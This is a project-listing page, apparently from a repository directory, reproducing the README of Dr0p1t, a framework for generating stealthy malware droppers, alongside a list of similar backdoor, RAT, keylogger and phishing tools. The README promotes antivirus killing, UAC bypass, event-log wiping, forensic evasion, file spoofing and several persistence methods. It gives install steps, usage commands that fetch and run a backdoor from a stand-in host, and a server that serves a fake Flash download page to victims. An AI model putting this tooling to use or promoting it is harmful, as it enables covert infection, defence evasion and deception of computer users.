D4Vinci / Dr0p1t Framework

Licence: mit
A framework that creates an advanced stealthy dropper that bypasses most AVs and has a lot of tricks

Programming Languages

python
powershell

Projects that are alternatives of or similar to Dr0p1t Framework

Diamorphine
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64)
Stars: ✭ 725 (-35.95%)
Mutual labels:  hacking, malware, pentest, hacking-tool, backdoor
Proton
Proton Framework is a Windows post-exploitation framework similar to other Windows post-exploitation frameworks. The major difference is that the Proton Framework does most of its operations using Windows Script Host, with compatibility in the core to support a default installation of Windows 2000 with no service packs all the way through Windows 10.
Stars: ✭ 142 (-87.46%)
Mutual labels:  kali-linux, hacking, hacking-tool, backdoor
Thefatrat
Thefatrat, a massive exploiting tool: an easy tool to generate backdoors and an easy tool for post-exploitation attacks like browser attacks, etc. This tool compiles malware with a popular payload, and the compiled malware can then be executed on Windows, Android, and Mac. The malware created with this tool also has the ability to bypass most AV softw…
Stars: ✭ 5,944 (+425.09%)
Mutual labels:  kali-linux, hacking, malware, backdoor
Mouse
Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.
Stars: ✭ 186 (-83.57%)
Mutual labels:  kali-linux, hacking, hacking-tool, backdoor
Phonia
Phonia Toolkit is one of the most advanced toolkits to scan phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone numbers with a very good accuracy.
Stars: ✭ 221 (-80.48%)
Mutual labels:  kali-linux, hacking, hacking-tool, social-engineering
Maskphish
Give a Mask to Phishing URL like a PRO.. A MUST have tool for Phishing.
Stars: ✭ 370 (-67.31%)
Mutual labels:  kali-linux, hacking-tool, phishing, social-engineering
Technowlogger
TechNowLogger is Windows/Linux Keylogger Generator which sends key-logs via email with other juicy target info
Stars: ✭ 172 (-84.81%)
Mutual labels:  persistence, kali-linux, hacking, pentest
VirusX5
The Most Powerful Fake Page Redirecting tool...
Stars: ✭ 15 (-98.67%)
Mutual labels:  phishing, kali-linux, hacking-tool, social-engineering
Pentesting Bible
Learn ethical hacking. Learn about reconnaissance, Windows/Linux hacking, attacking web technologies, and pen testing wireless networks. Resources for learning malware analysis and reverse engineering.
Stars: ✭ 8,981 (+693.37%)
Mutual labels:  kali-linux, hacking, malware, hacking-tool
Quack
Quack Toolkit is a set of tools to provide denial of service attacks. Quack Toolkit includes SMS attack tool, HTTP attack tool and many other attack tools.
Stars: ✭ 305 (-73.06%)
Mutual labels:  kali-linux, hacking, hacking-tool, social-engineering
Xeexe Topantivirusevasion
Undetectable & XOR encrypting with custom KEY (FUD Metasploit RAT), bypasses top antivirus like BitDefender, Malwarebytes, Avast, ESET-NOD32, AVG, ... & automatically adds ICON and MANIFEST to the executable
Stars: ✭ 387 (-65.81%)
Mutual labels:  hacking, malware, hacking-tool, backdoor
Hacktheworld
A Python script for generating payloads that bypass all antivirus so far.
Stars: ✭ 527 (-53.45%)
Mutual labels:  hacking, malware, backdoor
Onex
onex is a hacking tool installer and package manager for hackers. Onex is a library of all hacking tools for Termux and other Linux distributions. onex can install any third party tool or any hacking tool for you.
Stars: ✭ 537 (-52.56%)
Mutual labels:  kali-linux, hacking, hacking-tool
Impulse
💣 Impulse Denial-of-service ToolKit
Stars: ✭ 538 (-52.47%)
Mutual labels:  kali-linux, hacking, hacking-tool
Saint
👁 (s)AINT is a Spyware Generator for Windows systems written in Java. [Discontinued]
Stars: ✭ 522 (-53.89%)
Mutual labels:  persistence, hacking, hacking-tool
Powershell Rat
Python based backdoor that uses Gmail to exfiltrate data through attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends it to an attacker as an e-mail attachment.
Stars: ✭ 636 (-43.82%)
Mutual labels:  hacking, hacking-tool, backdoor
Shuffle
WebShell Backdoor Framework
Stars: ✭ 11 (-99.03%)
Mutual labels:  hacking, hacking-tool, backdoor
Ghost
Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration.
Stars: ✭ 992 (-12.37%)
Mutual labels:  kali-linux, hacking, backdoor
Thc Archive
All releases of the security research group (a.k.a. hackers) The Hacker's Choice
Stars: ✭ 474 (-58.13%)
Mutual labels:  hacking, pentest, hacking-tool
Jok3r
Jok3r v3 BETA 2 - Network and Web Pentest Automation Framework
Stars: ✭ 645 (-43.02%)
Mutual labels:  hacking, pentest, hacking-tool

Not maintained currently (Wait for the next version)


Dr0p1t-Framework

Have you ever heard about trojan droppers? In short, a dropper is a type of malware that downloads other malware, and Dr0p1t gives you the chance to create a stealthy dropper that bypasses most AVs and has a lot of tricks ( Trust me :D ) ;)

Features

+ Generated executable properties:

  • The executable size is smaller compared to other droppers generated the same way.
  • Downloads the executable on the target system and executes it silently.
  • Self-destruct function, so that the dropper will kill and delete itself after finishing its work.
  • Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion
  • Clear event log after finishing.

+ Framework properties:

+ Modules:

  • Find and kill antivirus before running the malware.
  • The ability to disable UAC.
  • The ability to run your malware as admin.
  • Full spoof by spoofing the file icon and extension to anything you want.
  • ZIP file support, so now you can compress your executable to a zip file before uploading.
  • Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable.
  • When running powershell scripts, it can bypass the execution policy.
  • Using UPX to compress the dropper after creating it

+ Persistence modules:

  • Adding the executable to startup after downloading it.
  • Adding the executable to the task scheduler after downloading it ( UAC doesn't matter ).
  • Adding your file to the powershell user profile, so your file will be downloaded and run every time powershell.exe runs if it doesn't exist.

Screenshots

On Windows

On Linux (Kali linux)

On OSX

Still not fully tested! Need some contributors and testers 😄

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information

Examples

./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

Prerequisites

  • Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x and the recommended version for Python 3 is 3.5.x. Don't use 3.6 because it's not yet supported by PyInstaller.

Needed dependencies for Linux

  • apt
  • Others will be installed from install.sh file

Note : You must have root access

Needed dependencies for Windows

  • pip
  • Modules in windows_requirements.txt

Installation

There's a playlist of all the official videos for installing and using Dr0p1t.

  • On Linux
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • On Windows (after downloading the ZIP and unzipping it)
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py

Note : in Python 2.7 you don't have pip, so install it first from the get-pip.py script [Google it]

Tested on:

  • Kali Linux Rolling
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Work with Dr0p1t-Server

Note : The server is still in beta; it has a lot of features to add and also needs a better design [ Need a designer to contribute :D ]

Prerequisites

  • Stable internet connection.
  • Port 5000 not in use, and the firewall configured not to block connections from it.

Installation & run server

The steps are the same on Linux and Windows: after installing Dr0p1t by following the steps mentioned above, install the modules in server_requirements.txt using pip, like this:

python -m pip install -r server_requirements.txt

Now let's run our server script:

python Dr0p1t_Server.py

After running the server script, it will start listening for all connections coming to port 5000 using Flask.

Now, to use the server from your device, open either 127.0.0.1:5000 or [Your IP]:5000 in a browser.

To open it from other devices on the LAN, open [Your Local IP]:5000, and for other devices on the WAN, open [Your Global IP]:5000, but first make sure that you have configured your router to forward port 5000 connections to you.

After opening the server page, you will see a simple website with a simple design asking you for the data needed.

Then submit the data; it will be verified through some processes, then the exe file will be generated and you will be redirected to a page telling you the scam link.

After entering the link, you will see a scam page to download the dropper, which is by default an Adobe Flash download page. To replace the scam page with yours, replace the content of the file "Scam.html" with yours, but remember the variables ( Don't remove them ).

No distribute scan ( Please don't scan with virus total:3 )

Disclaimer

Dr0p1t Framework is not responsible for misuse or for illegal purposes. Use it only for pentesting or educational purposes !!!

Copying code from this framework or using it in another tool is accepted as long as you mention where you got it from 😄

Pull requests are always welcomed :D
